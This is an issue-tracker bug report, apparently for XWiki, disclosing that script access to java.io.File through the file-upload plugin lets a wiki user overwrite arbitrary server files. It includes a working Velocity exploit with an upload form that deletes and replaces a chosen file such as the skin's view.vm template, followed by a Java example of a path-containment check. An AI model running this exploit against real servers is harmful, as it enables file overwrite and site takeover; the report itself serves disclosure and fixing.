Details
- Bug
- Resolution: Fixed
- Critical
- 2.3
- *nix (for Windows, just switch the slashes.)
- Low
- Medium
- N/A
- N/A
- Awaiting Committer feedback
Description
This sample exploit abuses the file upload plugin but I reported this as a core bug because the problem is not constrained to the file upload plugin and I suspect I can find at least a half dozen other places where it manifests.
The root of the problem is that the File class is too widely available and thus too much code is relied upon to keep the filesystem safe.
The goods:
{{velocity}}
#if($request.getContentType().startsWith('multipart/'))
  ## Grab the last uploaded part; getStoreLocation() hands the script a java.io.File
  #foreach($file in $xwiki.get('fileupload').getFileItems())
    #set($f = $file.getStoreLocation())
    #set($fi = $file)
  #end
  #set($f = $f.getAbsoluteFile())
  #foreach($part in $f.getCanonicalPath().split('/'))
    #set($path = $f.getParentFile())
  #end
  ## Start walking from two levels above the temporary store location
  #set($newf = $f.getParentFile().getParentFile())
  ## Descend component by component towards the attacker-supplied target path
  #foreach($part in $request.getParameter('filename').split('/'))
    #if($part != '')
      #if($use != '')
        #set($use = '')
        #foreach($subf in $newf.listFiles())
          #if($subf.getName() == $part)
            #set($use = $subf)
          #end
        #end
        #if($use != '')
          #set($newf = $use)
        #end
      #else
        Couldn't find the dir/file to write to ($part)
        #set($failed = 1)
      #end
    #end
  #end
  ## Delete the existing file and overwrite it with the uploaded content
  #if(!$failed && $newf.delete() && $fi.write($newf))
    == **Win!** ==
  #end
#end
{{html clean=false}}
<form action="$doc.getURL("view")" enctype="multipart/form-data" method="post">
  <dl>
    <dt>Where to save:</dt>
    <dd><input type="text" name="filename" value="/usr/local/jetty-6.1.3/webapps/xwikiTrunk/skins/colibri/view.vm" size="80"/></dd>
    <dt>What to save:</dt>
    <dd><input type="file" name="filepath" value="" size="40"/></dd>
  </dl>
  <input type="submit" value="Save!" class="button"/>
</form>
{{/html}}
{{/velocity}}
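For comparison, here is what the write step above amounts to in plain Java, next to the containment check a practitioner would expect before any user-influenced path reaches FileItem.write(File). This is an added illustration, not XWiki code and not part of the report: the class name SafeUploadTarget, the methods unsafeTarget/safeTarget and the base directory under java.io.tmpdir are all assumptions made for the example.

```java
import java.io.File;
import java.io.IOException;

/** Added example (not XWiki code): confine an upload destination to one base directory. */
public final class SafeUploadTarget {

    /** What the template above effectively does: the caller controls the whole destination path. */
    static File unsafeTarget(String userPath) {
        return new File(userPath); // e.g. .../skins/colibri/view.vm, then delete() + FileItem.write()
    }

    /**
     * Hardened variant: join the user-supplied name to a fixed base directory and
     * insist that the canonical result still lies inside that base.
     */
    static File safeTarget(File baseDir, String userPath) throws IOException {
        File base = baseDir.getCanonicalFile();
        // File(File, String) treats an absolute child as relative to the parent on
        // Unix, so "/etc/passwd" becomes <base>/etc/passwd rather than escaping.
        File candidate = new File(base, userPath).getCanonicalFile();
        // getCanonicalFile() resolves "..", repeated separators and symlinks, which
        // makes a string prefix test meaningful; the trailing separator stops
        // "/tmp/uploads" from matching "/tmp/uploads-evil".
        String basePrefix = base.getPath() + File.separator;
        if (!candidate.getPath().startsWith(basePrefix)) {
            throw new IOException("refusing to write outside " + base + ": " + userPath);
        }
        return candidate;
    }

    public static void main(String[] args) throws IOException {
        File base = new File(System.getProperty("java.io.tmpdir"), "uploads"); // assumed base dir
        base.mkdirs();
        String[] attempts = {
            "report.pdf",
            "../../../usr/local/jetty-6.1.3/webapps/xwikiTrunk/skins/colibri/view.vm",
            "skins/../../../etc/shadow",
        };
        for (String p : attempts) {
            try {
                System.out.println("accepted: " + safeTarget(base, p));
            } catch (IOException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

Note that this check only helps code that builds the destination itself; it does nothing for the case in the report, where the script never names a destination string at all but walks the tree with listFiles() starting from a File it was handed. The only defence there is not exposing java.io.File to the script layer in the first place.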
Issue Links
- is related to XCOMMONS-2125 Class#getSimpleName is restricted by the SecureIntrospector (Closed)